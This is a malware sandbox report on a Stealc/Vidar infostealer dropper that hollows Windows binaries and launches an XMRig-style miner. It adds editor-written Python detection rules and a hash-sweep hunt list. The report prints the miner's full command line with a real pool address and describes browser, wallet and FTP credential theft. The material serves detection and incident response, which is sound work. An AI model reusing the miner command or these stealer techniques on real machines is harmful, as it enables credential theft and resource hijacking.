Analysis

  • max time kernel
    157s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18-06-2024 14:48

General

  • Target

    #!~#0PEn_9797_P@$SW0rd~!^!!$/Setup.exe

  • Size

    2.3MB

  • MD5

    5d52ef45b6e5bf144307a84c2af1581b

  • SHA1

    414a899ec327d4a9daa53983544245b209f25142

  • SHA256

    26a24d3b0206c6808615c7049859c2fe62c4dcd87e7858be40ae8112b0482616

  • SHA512

    458f47c1e4ccf41edaacc57abb663ee77ca098fffc596fad941bbdea67653aeabc79b34d607078b9ee5adb45614e26f5c28a09e8faf9532081fdd5dec9ac3c48

  • SSDEEP

    49152:DzO+g39FbI0eQf/Z3CarWedoYAmXviDTMtT2wkqN5K:DzO19Fnf/hdoYAm9ZkqN5K

Malware Config

Extracted

Family

stealc

rc4.plain

Signatures

  • Detect Vidar Stealer 10 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers target stored browser data such as saved credentials, cookies and session tokens; the nss3.dll and mozglue.dll copies listed under Downloads are the Firefox libraries a stealer needs to decrypt Firefox's saved logins.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs

    Setting the thread context of another process is how injected code is handed control after being written with WriteProcessMemory; together with a child that is a signed Windows binary started with no arguments, it is the shape of process hollowing.
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It loads helper DLLs registered under HKLM\SOFTWARE\Microsoft\NetSh each time it starts, so a registered DLL runs whenever netsh is invoked (T1546.007). In this run the signature is attached to the netsh.exe instance (PID 2612) that Setup.exe started and wrote into, so check the NetSh key before treating this as persistence rather than netsh being used as a host process for injected code.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 2 IoCs

    Writes to the system certificate store (mapped to Install Root Certificate, T1553.004, in the matrix below); a root certificate added here is trusted by the OS and by Edge, so it should be enumerated and removed during cleanup.
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\netsh.exe
      C:\Windows\SysWOW64\netsh.exe
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Local\Temp\dcom.au3
        C:\Users\Admin\AppData\Local\Temp\dcom.au3
        3⤵
        • Checks computer location settings
        • Loads dropped DLL
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4292
        • C:\ProgramData\DHDAKFCGIJ.exe
          "C:\ProgramData\DHDAKFCGIJ.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4704
          • C:\Windows\SysWOW64\ftp.exe
            C:\Windows\SysWOW64\ftp.exe
            5⤵
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:3636
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
                PID:3720
        • C:\ProgramData\AFBAKKFCBF.exe
          "C:\ProgramData\AFBAKKFCBF.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1280
          • C:\Windows\SysWOW64\ftp.exe
            C:\Windows\SysWOW64\ftp.exe
            5⤵
            • Suspicious use of SetThreadContext
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4112
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4500
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:4644
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4248 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:1596
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2916 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:3
        1⤵
          PID:112
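The process tree above is the part of this report a detection engineer would want to turn into rules: a dropper that sets thread contexts and writes process memory, then starts a signed Windows binary (netsh.exe, ftp.exe, MSBuild.exe) with no arguments; LOLBins that never have children in normal use acting as parents; and an ngen.exe whose arguments (pool `--url`, `-u`/`-p`, `--donate-level`) have the command-line shape of the XMRig miner family, which the sandbox did not name. The following is an added example, not part of the report or of Triage: the EVENTS list is hand-assembled to mirror the tree (PIDs, images, command lines and a subset of the behaviour signatures shown per process), and the three rules are this example's own heuristics, with the ATT&CK sub-technique reference and the "XMRig-style" characterisation being the editor's, not the sandbox's.

```python
"""Detection rules over process-creation telemetry shaped like the tree above.

Added example, not part of the sandbox report. EVENTS is hand-assembled to
mirror the report's process tree; the three rules are this example's own
heuristics, not the sandbox's signatures.
"""
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Set


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int                               # 0 = no parent recorded
    image: str
    cmdline: str
    flags: FrozenSet[str] = frozenset()     # behaviour signatures logged for this PID


STC, WPM, MVS = "SetThreadContext", "WriteProcessMemory", "MapViewOfSection"
SAMPLE_DIR = r"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$"
NETFX = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"

# Constructed telemetry modelled on the report; the last entry is benign browser noise.
EVENTS = [
    Proc(2144, 0, SAMPLE_DIR + r"\Setup.exe", '"' + SAMPLE_DIR + r'\Setup.exe"', frozenset({STC, WPM, MVS})),
    Proc(2612, 2144, r"C:\Windows\SysWOW64\netsh.exe", r"C:\Windows\SysWOW64\netsh.exe", frozenset({WPM, MVS})),
    Proc(4292, 2612, r"C:\Users\Admin\AppData\Local\Temp\dcom.au3", r"C:\Users\Admin\AppData\Local\Temp\dcom.au3", frozenset({WPM})),
    Proc(4704, 4292, r"C:\ProgramData\DHDAKFCGIJ.exe", r'"C:\ProgramData\DHDAKFCGIJ.exe"', frozenset({STC, WPM, MVS})),
    Proc(3636, 4704, r"C:\Windows\SysWOW64\ftp.exe", r"C:\Windows\SysWOW64\ftp.exe", frozenset({WPM, MVS})),
    Proc(3720, 3636, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    Proc(1280, 4292, r"C:\ProgramData\AFBAKKFCBF.exe", r'"C:\ProgramData\AFBAKKFCBF.exe"', frozenset({STC, WPM, MVS})),
    Proc(4112, 1280, r"C:\Windows\SysWOW64\ftp.exe", r"C:\Windows\SysWOW64\ftp.exe", frozenset({STC, WPM, MVS})),
    Proc(4500, 4112, NETFX + r"\MSBuild.exe", NETFX + r"\MSBuild.exe", frozenset({STC, WPM})),
    Proc(4644, 4500, NETFX + r"\ngen.exe",
         NETFX + r"\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R "
         r"--variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl"),
    Proc(1596, 0, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
         r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --lang=en-US'),
]

WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\microsoft.net\\")
# Signed Windows binaries that do not spawn children in normal use; tune per environment
# (MSBuild does spawn compilers during real builds, so scope that entry to non-build hosts).
NO_CHILD_LOLBINS = {"ftp.exe", "netsh.exe", "msbuild.exe"}
MINER_URL = re.compile(r"--url=(?P<pool>[\w.\-]+:\d{2,5})\b")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_windows_binary(p: Proc) -> bool:
    return p.image.lower().startswith(WINDOWS_DIRS)


def bare_launch(p: Proc) -> bool:
    """Command line is nothing but the image path: how hollowing targets are usually started."""
    return p.cmdline.strip().strip('"').lower() == p.image.lower()


def looks_like_miner(cmdline: str) -> bool:
    """XMRig-style CLI: a pool --url plus a -u user and the distinctive --donate-level flag."""
    return bool(MINER_URL.search(cmdline)) and " -u " in cmdline and "--donate-level" in cmdline


def analyze(events: List[Proc]) -> List[dict]:
    by_pid = {p.pid: p for p in events}
    hits: List[dict] = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue
        # Rule 1: parent set a thread context and wrote process memory, child is a system
        # binary started with no arguments: the shape of process hollowing (T1055.012).
        if {STC, WPM} <= parent.flags and is_windows_binary(child) and bare_launch(child):
            hits.append({"rule": "hollowing", "pid": child.pid,
                         "detail": f"{basename(parent.image)} ({parent.pid}) -> {basename(child.image)}"})
        # Rule 2: ftp.exe / netsh.exe / MSBuild.exe acting as a parent at all.
        if basename(parent.image) in NO_CHILD_LOLBINS:
            hits.append({"rule": "lolbin-child", "pid": child.pid,
                         "detail": f"{basename(parent.image)} ({parent.pid}) spawned {basename(child.image)}"})
    # Rule 3: miner-style arguments, whatever signed image they were injected into.
    for p in events:
        if looks_like_miner(p.cmdline):
            hits.append({"rule": "miner-cmdline", "pid": p.pid,
                         "detail": "pool " + MINER_URL.search(p.cmdline)["pool"]})
    return hits


def miner_pools(events: List[Proc]) -> Set[str]:
    """host:port endpoints to block or hunt for in proxy and NetFlow data."""
    return {MINER_URL.search(p.cmdline)["pool"] for p in events if looks_like_miner(p.cmdline)}


if __name__ == "__main__":
    for h in analyze(EVENTS):
        print(f"[{h['rule']:<13}] pid {h['pid']:<5} {h['detail']}")
    print("miner pools:", sorted(miner_pools(EVENTS)))
```

Run against the constructed events, rule 1 flags the four bare-started system binaries whose parents had SetThreadContext and WriteProcessMemory (netsh.exe, both ftp.exe instances, MSBuild.exe), rule 2 flags every child of those LOLBins including the final ngen.exe, and rule 3 recovers the pool endpoint as a network IOC. Rule 1 deliberately does not fire on ngen.exe, which was started with arguments; that instance is caught by its parent and its command line instead, which is why the three rules are kept separate rather than merged.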

        Network

        MITRE ATT&CK Matrix (ATT&CK v13; the number after each technique is the hit count shown in the matrix)

        Persistence
        • Event Triggered Execution (T1546): 1
          • Netsh Helper DLL (T1546.007): 1

        Privilege Escalation
        • Event Triggered Execution (T1546): 1
          • Netsh Helper DLL (T1546.007): 1

        Defense Evasion
        • Subvert Trust Controls (T1553): 1
          • Install Root Certificate (T1553.004): 1
        • Modify Registry (T1112): 1

        Credential Access
        • Unsecured Credentials (T1552): 4
          • Credentials In Files (T1552.001): 4

        Discovery
        • Query Registry (T1012): 3
        • System Information Discovery (T1082): 3

        Collection
        • Data from Local System (T1005): 4

        Downloads

        • C:\ProgramData\AFBAKKFCBF.exe
          Filesize

          2.3MB

          MD5

          daaff76b0baf0a1f9cec253560c5db20

          SHA1

          0311cf0eeb4beddd2c69c6e97462595313a41e78

          SHA256

          5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c

          SHA512

          987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

        • C:\ProgramData\DHDAKFCGIJ.exe
          Filesize

          8.6MB

          MD5

          6cfddd5ce9ca4bb209bd5d8c2cd80025

          SHA1

          424da82e9edbb6b39a979ab97d84239a1d67c48b

          SHA256

          376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7

          SHA512

          d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

        • C:\ProgramData\HDGIEBGHDAEB\mozglue.dll
          Filesize

          593KB

          MD5

          c8fd9be83bc728cc04beffafc2907fe9

          SHA1

          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

          SHA256

          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

          SHA512

          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

        • C:\ProgramData\HDGIEBGHDAEB\nss3.dll
          Filesize

          2.0MB

          MD5

          1cc453cdf74f31e4d913ff9c10acdde2

          SHA1

          6e85eae544d6e965f15fa5c39700fa7202f3aafe

          SHA256

          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

          SHA512

          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
          Filesize

          2B

          MD5

          d751713988987e9331980363e24189ce

          SHA1

          97d170e1550eee4afc0af065b78cda302a97674c

          SHA256

          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

          SHA512

          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
          Filesize

          40B

          MD5

          20d4b8fa017a12a108c87f540836e250

          SHA1

          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

          SHA256

          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

          SHA512

          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

        • C:\Users\Admin\AppData\Local\Temp\30952b7c
          Filesize

          6.8MB

          MD5

          c72dbe62a344b8d98ae6fe1c28e7fb19

          SHA1

          0374c999e0f43dae3cc98c741f25761b29316ca7

          SHA256

          97a5b686037eaedcdfb2ad97529c830ef44a23d21092cfdfbe0c7281727bce84

          SHA512

          e50b5fd956793b0913f79921714de2bd021906b17b46a123e42a5dbe8dc4995a4c9cd2c30c3db0bd30404bbae3e4f7fc0270c11326d69613f36ad3c9407acf39

        • C:\Users\Admin\AppData\Local\Temp\58822b52
          Filesize

          1.1MB

          MD5

          8d443e7cb87cacf0f589ce55599e008f

          SHA1

          c7ff0475a3978271e0a8417ac4a826089c083772

          SHA256

          e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a

          SHA512

          c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

        • C:\Users\Admin\AppData\Local\Temp\58ce8638
          Filesize

          951KB

          MD5

          c62f812e250409fbd3c78141984270f2

          SHA1

          9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806

          SHA256

          d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8

          SHA512

          7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

        • C:\Users\Admin\AppData\Local\Temp\5a55639c
          Filesize

          1.1MB

          MD5

          24ee63d61846d5c681fd11bc175b8677

          SHA1

          85dd0289b1b9d2815db5824ad7b9b30a8b344f36

          SHA256

          5ba7fccb1d10ab49f67ee3bc798ec3526deb40884a25f284d53e35df06d19189

          SHA512

          63b83c530f118a7b7d2ca4aa3b72ea488a86447a100a046da1fc4b32a9a8c0d5addf195545db781c17cdfc92510d95960a12c341ca8ba3329851ea6825409c95

        • C:\Users\Admin\AppData\Local\Temp\5a757ad9
          Filesize

          736KB

          MD5

          038e252a69760e572c5d8195d91bed8e

          SHA1

          29b052cedbb9eec939a7cc26970dedf3f8251bab

          SHA256

          ea0c6eb3cdf3aade407c22e3a13c47b4942d61041ed59aa9f41100043aadb4b2

          SHA512

          24174e8cd3a02aa76f3fc35aa55e2a6aa412da294ce80b368c7d57edc5ac7f7e6ee002b3dd3d48ec517b74a500e270cb3efce3ceac4cf10c31e189b9199a066f

        • C:\Users\Admin\AppData\Local\Temp\dcom.au3
          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

        • memory/1280-155-0x0000000000D50000-0x0000000000F98000-memory.dmp
          Filesize

          2.3MB

        • memory/1280-164-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/1280-165-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/1280-177-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-16-0x0000000050310000-0x0000000050349000-memory.dmp
          Filesize

          228KB

        • memory/2144-15-0x0000000050120000-0x000000005030D000-memory.dmp
          Filesize

          1.9MB

        • memory/2144-17-0x00000000744F2000-0x00000000744F4000-memory.dmp
          Filesize

          8KB

        • memory/2144-19-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-18-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-10-0x0000000000400000-0x0000000000698000-memory.dmp
          Filesize

          2.6MB

        • memory/2144-0-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2144-12-0x0000000050000000-0x0000000050116000-memory.dmp
          Filesize

          1.1MB

        • memory/2144-14-0x0000000057000000-0x000000005703F000-memory.dmp
          Filesize

          252KB

        • memory/2144-13-0x0000000057800000-0x0000000057812000-memory.dmp
          Filesize

          72KB

        • memory/2144-11-0x0000000059800000-0x000000005986E000-memory.dmp
          Filesize

          440KB

        • memory/2144-1-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/2612-28-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2612-33-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/2612-30-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/2612-32-0x00000000744E0000-0x000000007465B000-memory.dmp
          Filesize

          1.5MB

        • memory/3636-180-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4112-183-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/4112-181-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4112-195-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/4292-45-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-41-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4292-39-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-166-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-173-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-194-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-42-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-193-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-46-0x0000000061E00000-0x0000000061EF3000-memory.dmp
          Filesize

          972KB

        • memory/4292-123-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-182-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4292-140-0x0000000001400000-0x0000000001B4C000-memory.dmp
          Filesize

          7.3MB

        • memory/4500-202-0x0000000000400000-0x000000000040A000-memory.dmp
          Filesize

          40KB

        • memory/4704-162-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp
          Filesize

          2.0MB

        • memory/4704-174-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB

        • memory/4704-139-0x0000000000400000-0x0000000000913000-memory.dmp
          Filesize

          5.1MB

        • memory/4704-161-0x0000000072B10000-0x0000000072C8B000-memory.dmp
          Filesize

          1.5MB
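The Downloads list mixes three kinds of artifact: the two payloads written to C:\ProgramData, the Firefox NSS libraries (nss3.dll, mozglue.dll) dropped into a random-named ProgramData directory so the stealer can decrypt Firefox logins, nameless blobs in Temp, and Edge's own profile files (the 2-byte "SCT Auditing Pending Reports" is just the JSON text `[]`) that the browser wrote during the run and that would poison a hunt list. The following is an added example, not part of the report: the paths and SHA-256 values are copied from the entries above (a subset of them), while the classification rules, the hunt-list builder and the directory sweep are this example's own, and the planted file in `demo_sweep` is a constructed stand-in, not the real payload.

```python
"""Curate the dropped-file list into a hunt list and sweep a directory tree for it.

Added example, not part of the report. DROPPED copies paths and SHA-256 values
from the Downloads section above (a subset); the rules and the sweep are this
example's own.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class Dropped:
    path: str
    sha256: str


DROPPED = [
    Dropped(r"C:\ProgramData\AFBAKKFCBF.exe",
            "5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c"),
    Dropped(r"C:\ProgramData\DHDAKFCGIJ.exe",
            "376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7"),
    Dropped(r"C:\ProgramData\HDGIEBGHDAEB\mozglue.dll",
            "ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a"),
    Dropped(r"C:\ProgramData\HDGIEBGHDAEB\nss3.dll",
            "ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5"),
    Dropped(r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports",
            "4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945"),
    Dropped(r"C:\Users\Admin\AppData\Local\Temp\30952b7c",
            "97a5b686037eaedcdfb2ad97529c830ef44a23d21092cfdfbe0c7281727bce84"),
    Dropped(r"C:\Users\Admin\AppData\Local\Temp\dcom.au3",
            "237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d"),
]

BROWSER_PROFILE = "\\appdata\\local\\microsoft\\edge\\user data\\"
NSS_LIBS = {"nss3.dll", "mozglue.dll"}   # Firefox crypto libraries stealers ship to decrypt logins.json
SHA256_EMPTY_JSON_ARRAY = hashlib.sha256(b"[]").hexdigest()


def classify(d: Dropped) -> str:
    low = d.path.lower()
    name = low.rsplit("\\", 1)[-1]
    if BROWSER_PROFILE in low:
        return "browser-noise"          # Edge writing its own profile files during the run
    if name in NSS_LIBS and "mozilla firefox" not in low:
        return "stealer-dependency"     # NSS libraries dropped outside any Firefox install
    if low.startswith("c:\\programdata\\") and name.endswith(".exe"):
        return "dropped-payload"
    return "unknown-blob"               # nameless Temp files: carve and inspect by hand


def hunt_list(entries: Iterable[Dropped]) -> Dict[str, str]:
    """sha256 -> path seen in the sandbox, for everything that is not browser noise."""
    return {d.sha256: d.path for d in entries if classify(d) != "browser-noise"}


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: str, iocs: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Walk root, hash every file, return (local path, sha256, sandbox path) for each match."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            local = os.path.join(dirpath, name)
            digest = sha256_file(local)
            if digest in iocs:
                hits.append((local, digest, iocs[digest]))
    return hits


def demo_sweep() -> List[Tuple[str, str, str]]:
    """Stand-alone check: plant a constructed file, add its hash to the hunt list, sweep."""
    with tempfile.TemporaryDirectory() as root:
        planted = os.path.join(root, "sub", "AFBAKKFCBF.exe")
        os.makedirs(os.path.dirname(planted))
        with open(planted, "wb") as fh:
            fh.write(b"MZ constructed stand-in, not the real payload\n")
        iocs = dict(hunt_list(DROPPED))
        iocs[sha256_file(planted)] = r"C:\ProgramData\AFBAKKFCBF.exe (constructed stand-in)"
        return sweep(root, iocs)


if __name__ == "__main__":
    for d in DROPPED:
        print(f"{classify(d):<19} {d.path}")
    print("2-byte Edge file is literally '[]':", DROPPED[4].sha256 == SHA256_EMPTY_JSON_ARRAY)
    print("demo sweep hits:", demo_sweep())
```

Hash matching only catches byte-identical drops; the random directory name HDGIEBGHDAEB and the random-looking executable names will differ per victim, so a real hunt should pair the hash list with the path pattern (a DLL named nss3.dll or mozglue.dll anywhere under C:\ProgramData outside a Firefox install), which is what the `stealer-dependency` class is for.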